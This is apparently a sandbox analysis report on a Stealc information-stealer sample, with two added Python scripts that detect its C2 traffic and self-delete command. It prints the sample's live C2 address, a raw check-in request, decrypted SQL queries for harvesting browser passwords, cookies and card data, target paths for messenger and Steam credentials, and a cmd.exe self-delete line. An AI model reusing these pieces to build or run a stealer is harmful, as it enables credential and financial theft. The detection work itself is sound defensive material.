
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1546392
MD5: 508dc49e57681ea817bd36f9770ad609
SHA1: d3cb94f703fa7549d47d9984393c34413bacb53f
SHA256: bd37eb6db999d3f29ae806b66fb66d0f8e378b6b9169ecb9b7b7ed7308c0c7bf
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6976 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 508DC49E57681EA817BD36F9770AD609)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads seven legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1727662731.00000000011AE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.1685626986.0000000004F20000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 6976 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 6976 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.180000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
                No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-31T20:48:00.319326+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | TCP
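The report's network evidence is a single POST from the sandbox host to the configured gate, carrying no User-Agent (see the signature "HTTP GET or POST without a user agent"), followed by the stealer pulling its seven helper DLLs from the same server. The script below is an added example, not part of the Joe Sandbox report: it turns the extracted configuration into detection logic over an HTTP proxy log. The C2 host and gate path are the report's; the download directory `/746f34465cf17784/` is taken from the decrypted strings and its use for the DLL fetches is an assumption; the log format, the log lines and the function names (`analyze`, `infected_clients`) are constructed for this example.

```python
"""Flag Stealc C2 traffic in an HTTP proxy log.

Added example (not part of the Joe Sandbox report). The C2 host, gate path and
download directory come from the report's extracted configuration and decrypted
strings; the log format and the log lines are constructed for this example and
mirror the report's Suricata alert (POST from 192.168.2.4 to 185.215.113.206:80).
"""
import re
from dataclasses import dataclass

# From the extracted configuration and decrypted strings above.
C2_HOST = "185.215.113.206"
C2_GATE = "/6c4adf523b719729.php"
C2_DIR = "/746f34465cf17784/"   # assumption: the directory the helper DLLs are fetched from

# The seven legitimate DLLs Stealc downloads to parse browser databases (from the report).
HELPER_DLLS = {"sqlite3.dll", "nss3.dll", "vcruntime140.dll", "mozglue.dll",
               "freebl3.dll", "softokn3.dll", "msvcp140.dll"}

# Constructed log format: "<ts> <client> <METHOD> http://<host><path> <status> ua=<user-agent or ->"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) "
    r"http://(?P<host>[^/\s]+)(?P<path>\S*) (?P<status>\d{3}) ua=(?P<ua>.*)$"
)


@dataclass(frozen=True)
class Hit:
    ts: str
    src: str
    severity: str   # "high" = known Stealc C2, "low" = generic heuristic
    reason: str


def analyze(log_text: str) -> list:
    """Return one Hit per log line that matches a Stealc C2 pattern, in log order."""
    hits = []
    for raw in log_text.splitlines():
        m = LOG_RE.match(raw.strip())
        if not m:
            continue                      # unparseable line: skip (count these in production)
        f = m.groupdict()
        no_ua = f["ua"].strip() in ("", "-")
        filename = f["path"].rsplit("/", 1)[-1].lower()
        if f["host"] == C2_HOST and f["path"] == C2_GATE and f["method"] == "POST":
            reason = "POST to Stealc gate" + (" without User-Agent" if no_ua else "")
            hits.append(Hit(f["ts"], f["src"], "high", reason))
        elif f["host"] == C2_HOST and f["path"].startswith(C2_DIR) and filename in HELPER_DLLS:
            hits.append(Hit(f["ts"], f["src"], "high",
                            f"fetch of browser-parsing helper {filename} from C2"))
        elif f["host"] == C2_HOST:
            hits.append(Hit(f["ts"], f["src"], "high", "other traffic to known Stealc C2"))
        elif f["method"] == "POST" and no_ua:
            # Stealc's HTTP calls carry no User-Agent; on its own this is only a weak signal.
            hits.append(Hit(f["ts"], f["src"], "low", "POST without User-Agent"))
    return hits


def infected_clients(hits: list) -> set:
    """Clients with at least one high-severity hit (candidates for isolation)."""
    return {h.src for h in hits if h.severity == "high"}


# Constructed sample log: the first two lines reproduce the report's observed C2 exchange.
SAMPLE_LOG = """\
2024-10-31T20:48:00 192.168.2.4 POST http://185.215.113.206/6c4adf523b719729.php 200 ua=-
2024-10-31T20:48:03 192.168.2.4 GET http://185.215.113.206/746f34465cf17784/sqlite3.dll 200 ua=-
2024-10-31T20:48:05 192.168.2.7 GET http://example.com/index.html 200 ua=Mozilla/5.0
2024-10-31T20:48:07 192.168.2.7 POST http://example.com/api/login 200 ua=Mozilla/5.0
2024-10-31T20:48:09 192.168.2.9 POST http://example.com/telemetry 200 ua=-
"""

if __name__ == "__main__":
    for hit in analyze(SAMPLE_LOG):
        print(f"{hit.ts} {hit.src} [{hit.severity}] {hit.reason}")
    print("isolate:", sorted(infected_clients(analyze(SAMPLE_LOG))))
```

The gate match and the helper-DLL fetch are rated high because both tie a client to this sample's infrastructure; the missing User-Agent is kept as a separate low-severity heuristic because plenty of benign agents omit it, so it should raise priority on a C2 hit rather than page anyone by itself.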


                AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.180000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: 0.2.file.exe.180000.0.unpack | String decryptor (recovered strings):
  • INSERT_KEY_HERE
  • 30
  • 11
  • 20
  • 24
  • GetProcAddress
  • LoadLibraryA
  • lstrcatA
  • OpenEventA
  • CreateEventA
  • CloseHandle
  • Sleep
  • GetUserDefaultLangID
  • VirtualAllocExNuma
  • VirtualFree
  • GetSystemInfo
  • VirtualAlloc
  • HeapAlloc
  • GetComputerNameA
  • lstrcpyA
  • GetProcessHeap
  • GetCurrentProcess
  • lstrlenA
  • ExitProcess
  • GlobalMemoryStatusEx
  • GetSystemTime
  • SystemTimeToFileTime
  • advapi32.dll
  • gdi32.dll
  • user32.dll
  • crypt32.dll
  • ntdll.dll
  • GetUserNameA
  • CreateDCA
  • GetDeviceCaps
  • ReleaseDC
  • CryptStringToBinaryA
  • sscanf
  • VMwareVMware
  • HAL9TH
  • JohnDoe
  • DISPLAY
  • %hu/%hu/%hu
  • http://185.215.113.206
  • bksvnsj
  • /6c4adf523b719729.php
  • /746f34465cf17784/
  • tale
  • GetEnvironmentVariableA
  • GetFileAttributesA
  • GlobalLock
  • HeapFree
  • GetFileSize
  • GlobalSize
  • CreateToolhelp32Snapshot
  • IsWow64Process
  • Process32Next
  • GetLocalTime
  • FreeLibrary
  • GetTimeZoneInformation
  • GetSystemPowerStatus
  • GetVolumeInformationA
  • GetWindowsDirectoryA
  • Process32First
  • GetLocaleInfoA
  • GetUserDefaultLocaleName
  • GetModuleFileNameA
  • DeleteFileA
  • FindNextFileA
  • LocalFree
  • FindClose
  • SetEnvironmentVariableA
  • LocalAlloc
  • GetFileSizeEx
  • ReadFile
  • SetFilePointer
  • WriteFile
  • CreateFileA
  • FindFirstFileA
  • CopyFileA
  • VirtualProtect
  • GetLogicalProcessorInformationEx
  • GetLastError
  • lstrcpynA
  • MultiByteToWideChar
  • GlobalFree
  • WideCharToMultiByte
  • GlobalAlloc
  • OpenProcess
  • TerminateProcess
  • GetCurrentProcessId
  • gdiplus.dll
  • ole32.dll
  • bcrypt.dll
  • wininet.dll
  • shlwapi.dll
  • shell32.dll
  • psapi.dll
  • rstrtmgr.dll
  • CreateCompatibleBitmap
  • SelectObject
  • BitBlt
  • DeleteObject
  • CreateCompatibleDC
  • GdipGetImageEncodersSize
  • GdipGetImageEncoders
  • GdipCreateBitmapFromHBITMAP
  • GdiplusStartup
  • GdiplusShutdown
  • GdipSaveImageToStream
  • GdipDisposeImage
  • GdipFree
  • GetHGlobalFromStream
  • CreateStreamOnHGlobal
  • CoUninitialize
  • CoInitialize
  • CoCreateInstance
  • BCryptGenerateSymmetricKey
  • BCryptCloseAlgorithmProvider
  • BCryptDecrypt
  • BCryptSetProperty
  • BCryptDestroyKey
  • BCryptOpenAlgorithmProvider
  • GetWindowRect
  • GetDesktopWindow
  • GetDC
  • CloseWindow
  • wsprintfA
  • EnumDisplayDevicesA
  • GetKeyboardLayoutList
  • CharToOemW
  • wsprintfW
  • RegQueryValueExA
  • RegEnumKeyExA
  • RegOpenKeyExA
  • RegCloseKey
  • RegEnumValueA
  • CryptBinaryToStringA
  • CryptUnprotectData
  • SHGetFolderPathA
  • ShellExecuteExA
  • InternetOpenUrlA
  • InternetConnectA
  • InternetCloseHandle
  • InternetOpenA
  • HttpSendRequestA
  • HttpOpenRequestA
  • InternetReadFile
  • InternetCrackUrlA
  • StrCmpCA
  • StrStrA
  • StrCmpCW
  • PathMatchSpecA
  • GetModuleFileNameExA
  • RmStartSession
  • RmRegisterResources
  • RmGetList
  • RmEndSession
  • sqlite3_open
  • sqlite3_prepare_v2
  • sqlite3_step
  • sqlite3_column_text
  • sqlite3_finalize
  • sqlite3_close
  • sqlite3_column_bytes
  • sqlite3_column_blob
  • encrypted_key
  • PATH
  • C:\ProgramData\nss3.dll
  • NSS_Init
  • NSS_Shutdown
  • PK11_GetInternalKeySlot
  • PK11_FreeSlot
  • PK11_Authenticate
  • PK11SDR_Decrypt
  • C:\ProgramData\
  • SELECT origin_url, username_value, password_value FROM logins
  • browser:
  • profile:
  • url:
  • login:
  • password:
  • Opera
  • OperaGX
  • Network
  • cookies
  • .txt
  • SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
  • TRUE
  • FALSE
  • autofill
  • SELECT name, value FROM autofill
  • history
  • SELECT url FROM urls LIMIT 1000
  • cc
  • SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
  • name:
  • month:
  • year:
  • card:
  • Cookies
  • Login Data
  • Web Data
  • History
  • logins.json
  • formSubmitURL
  • usernameField
  • encryptedUsername
  • encryptedPassword
  • guid
  • SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
  • SELECT fieldname, value FROM moz_formhistory
  • SELECT url FROM moz_places LIMIT 1000
  • cookies.sqlite
  • formhistory.sqlite
  • places.sqlite
  • plugins
  • Local Extension Settings
  • Sync Extension Settings
  • IndexedDB
  • Opera Stable
  • Opera GX Stable
  • CURRENT
  • chrome-extension_
  • _0.indexeddb.leveldb
  • Local State
  • profiles.ini
  • chrome
  • opera
  • firefox
  • wallets
  • %08lX%04lX%lu
  • SOFTWARE\Microsoft\Windows NT\CurrentVersion
  • ProductName
  • x32
  • x64
  • %d/%d/%d %d:%d:%d
  • HARDWARE\DESCRIPTION\System\CentralProcessor\0
  • ProcessorNameString
  • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
  • DisplayName
  • DisplayVersion
  • Network Info:
  • - IP: IP?
  • - Country: ISO?
  • System Summary:
  • - HWID:
  • - OS:
  • - Architecture:
  • - UserName:
  • - Computer Name:
  • - Local Time:
  • - UTC:
  • - Language:
  • - Keyboards:
  • - Laptop:
  • - Running Path:
  • - CPU:
  • - Threads:
  • - Cores:
  • - RAM:
  • - Display Resolution:
  • - GPU:
  • User Agents:
  • Installed Apps:
  • All Users:
  • Current User:
  • Process List:
  • system_info.txt
  • freebl3.dll
  • mozglue.dll
  • msvcp140.dll
  • nss3.dll
  • softokn3.dll
  • vcruntime140.dll
  • \Temp\
  • .exe
  • runas
  • open
  • /c start
  • %DESKTOP%
  • %APPDATA%
  • %LOCALAPPDATA%
  • %USERPROFILE%
  • %DOCUMENTS%
  • %PROGRAMFILES%
  • %PROGRAMFILES_86%
  • %RECENT%
  • *.lnk
  • files
  • \discord\
  • \Local Storage\leveldb\CURRENT
  • \Local Storage\leveldb
  • \Telegram Desktop\
  • key_datas
  • D877F783D5D3EF8C*
  • map*
  • A7FDF864FBC10B77*
  • A92DAA6EA6F891F2*
  • F8806DD0C461824F*
  • Telegram
  • Tox
  • *.tox
  • *.ini
  • Password
  • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
  • Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
  • Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
  • Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
  • Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
  • oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
  • 00000001
  • 00000002
  • 00000003
  • 00000004
  • \Outlook\accounts.txt
  • Pidgin
  • \.purple\
  • accounts.xml
  • dQw4w9WgXcQ
  • token:
  • Software\Valve\Steam
  • SteamPath
  • \config\
  • ssfn*
  • config.vdf
  • DialogConfig.vdf
  • DialogConfigOverlay*.vdf
  • libraryfolders.vdf
  • loginusers.vdf
                Source: 0.2.file.exe.180000.0.unpackString decryptor: \Steam\
                Source: 0.2.file.exe.180000.0.unpackString decryptor: sqlite3.dll
                Source: 0.2.file.exe.180000.0.unpackString decryptor: browsers
                Source: 0.2.file.exe.180000.0.unpackString decryptor: done
                Source: 0.2.file.exe.180000.0.unpackString decryptor: soft
                Source: 0.2.file.exe.180000.0.unpackString decryptor: \Discord\tokens.txt
                Source: 0.2.file.exe.180000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                Source: 0.2.file.exe.180000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                Source: 0.2.file.exe.180000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                Source: 0.2.file.exe.180000.0.unpackString decryptor: https
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                Source: 0.2.file.exe.180000.0.unpackString decryptor: POST
                Source: 0.2.file.exe.180000.0.unpackString decryptor: HTTP/1.1
                Source: 0.2.file.exe.180000.0.unpackString decryptor: Content-Disposition: form-data; name="
                Source: 0.2.file.exe.180000.0.unpackString decryptor: hwid
                Source: 0.2.file.exe.180000.0.unpackString decryptor: build
                Source: 0.2.file.exe.180000.0.unpackString decryptor: token
                Source: 0.2.file.exe.180000.0.unpackString decryptor: file_name
                Source: 0.2.file.exe.180000.0.unpackString decryptor: file
                Source: 0.2.file.exe.180000.0.unpackString decryptor: message
                Source: 0.2.file.exe.180000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                Source: 0.2.file.exe.180000.0.unpackString decryptor: screenshot.jpg
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00199030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00199030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_0018A210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018A2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_0018A2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001872A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_001872A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0018C920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1685626986.0000000004F4B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1685626986.0000000004F4B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001940F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_001940F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0018E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00181710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00181710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0018F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001947C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_001947C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00193B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00193B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00194B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00194B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0018DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0018EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0018BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0018DF10
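The decrypted strings "/c timeout /t 5 & del /f /q \"", "\" & del \"C:\ProgramData\*.dll\"\" & exit" and "C:\Windows\system32\cmd.exe" describe the sample's cleanup step: it spawns cmd.exe, waits, deletes its own executable and wipes any DLLs it staged under C:\ProgramData. That three-part command line is a good process-creation detection. The script below is an added example for this report, not Joe Sandbox code and not code from the sample; the process events it scans are constructed in the shape of Sysmon Event ID 1 records, and the thresholds and field names are the author's choice.

```python
"""Flag the cmd.exe self-delete chain present in the sample's decrypted strings."""
import re

# Constructed events (Sysmon Event ID 1 shape). The first mirrors the report's
# decrypted strings; the other two are benign look-alikes used to show the scoring.
SAMPLE_EVENTS = [
    {
        "Image": r"C:\Windows\system32\cmd.exe",
        "ParentImage": r"C:\Users\user\Desktop\file.exe",
        "CommandLine": (
            r'"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q '
            r'"C:\Users\user\Desktop\file.exe" & del "C:\ProgramData\*.dll"" & exit'
        ),
    },
    {   # Benign: an admin script that waits and reboots.
        "Image": r"C:\Windows\system32\cmd.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"cmd.exe /c timeout /t 30 & shutdown /r /t 0",
    },
    {   # Partial overlap: delayed delete of a log file, not of the parent image.
        "Image": r"C:\Windows\system32\cmd.exe",
        "ParentImage": r"C:\Program Files\Updater\updater.exe",
        "CommandLine": r'cmd.exe /c timeout /t 5 & del /f /q "C:\Temp\old.log"',
    },
]

# Fragments lifted from the decrypted strings above.
TIMEOUT_RE = re.compile(r"\btimeout\s+/t\s+\d+", re.IGNORECASE)
DEL_QUOTED_RE = re.compile(r'\bdel\s+/f\s+/q\s+"([^"]+)"', re.IGNORECASE)
DEL_PROGRAMDATA_RE = re.compile(r'\bdel\s+"C:\\ProgramData\\\*\.dll"', re.IGNORECASE)


def classify(event: dict) -> dict:
    """Score one cmd.exe event and say whether the deleted path is its own parent."""
    image = event.get("Image", "").lower()
    if not image.endswith("cmd.exe"):
        return {"score": 0, "indicators": [], "self_delete": False}
    cmd = event.get("CommandLine", "")
    indicators = []
    if TIMEOUT_RE.search(cmd):
        indicators.append("delayed execution via timeout")
    self_delete = False
    m = DEL_QUOTED_RE.search(cmd)
    if m:
        indicators.append("forced quiet delete of a quoted path")
        parent = event.get("ParentImage", "").lower()
        self_delete = bool(parent) and m.group(1).lower() == parent
        if self_delete:
            indicators.append("deleted path equals ParentImage (self-delete)")
    if DEL_PROGRAMDATA_RE.search(cmd):
        indicators.append("wipes C:\\ProgramData\\*.dll")
    return {"score": len(indicators), "indicators": indicators, "self_delete": self_delete}


def scan(events, threshold: int = 3):
    """Return (event, verdict) pairs whose score reaches the threshold."""
    hits = []
    for ev in events:
        verdict = classify(ev)
        if verdict["score"] >= threshold:
            hits.append((ev, verdict))
    return hits


if __name__ == "__main__":
    for ev, verdict in scan(SAMPLE_EVENTS):
        print(ev["ParentImage"], "->", verdict)
```

The self-delete indicator is the one that separates this from ordinary cleanup scripts: a timeout followed by del on its own parent image, plus a wildcard delete under C:\ProgramData, is worth alerting on regardless of which stealer family produced it.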

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/6c4adf523b719729.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
  Host: 185.215.113.206
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----CAEHJEBKFCAKKFIEHDBF
  Host: 185.215.113.206
  Content-Length: 210
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 36 30 38 34 46 37 43 45 39 30 33 32 30 34 39 37 30 30 37 35 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 2d 2d 0d 0a
  Data Ascii:
    ------CAEHJEBKFCAKKFIEHDBF
    Content-Disposition: form-data; name="hwid"

    06084F7CE903204970075
    ------CAEHJEBKFCAKKFIEHDBF
    Content-Disposition: form-data; name="build"

    tale
    ------CAEHJEBKFCAKKFIEHDBF--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (7 connections)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001862D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: file.exe, 00000000.00000002.1727662731.00000000011AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1727662731.00000000011AE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1727662731.0000000001209000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1727662731.00000000011AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/4
Source: file.exe, 00000000.00000002.1727662731.00000000011AE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1727662731.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1727662731.0000000001209000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.1727662731.0000000001209000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/c
Source: file.exe, 00000000.00000002.1727662731.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1727662731.0000000001209000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php6
Source: file.exe, 00000000.00000002.1727662731.00000000011F3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpS
Source: file.exe, 00000000.00000002.1727662731.00000000011F3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpk
Source: file.exe, 00000000.00000002.1727662731.0000000001209000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/Z
Source: file.exe, 00000000.00000002.1727662731.0000000001209000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/_
Source: file.exe, 00000000.00000002.1727662731.00000000011AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206j
Source: file.exe, 00000000.00000003.1685626986.0000000004F4B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
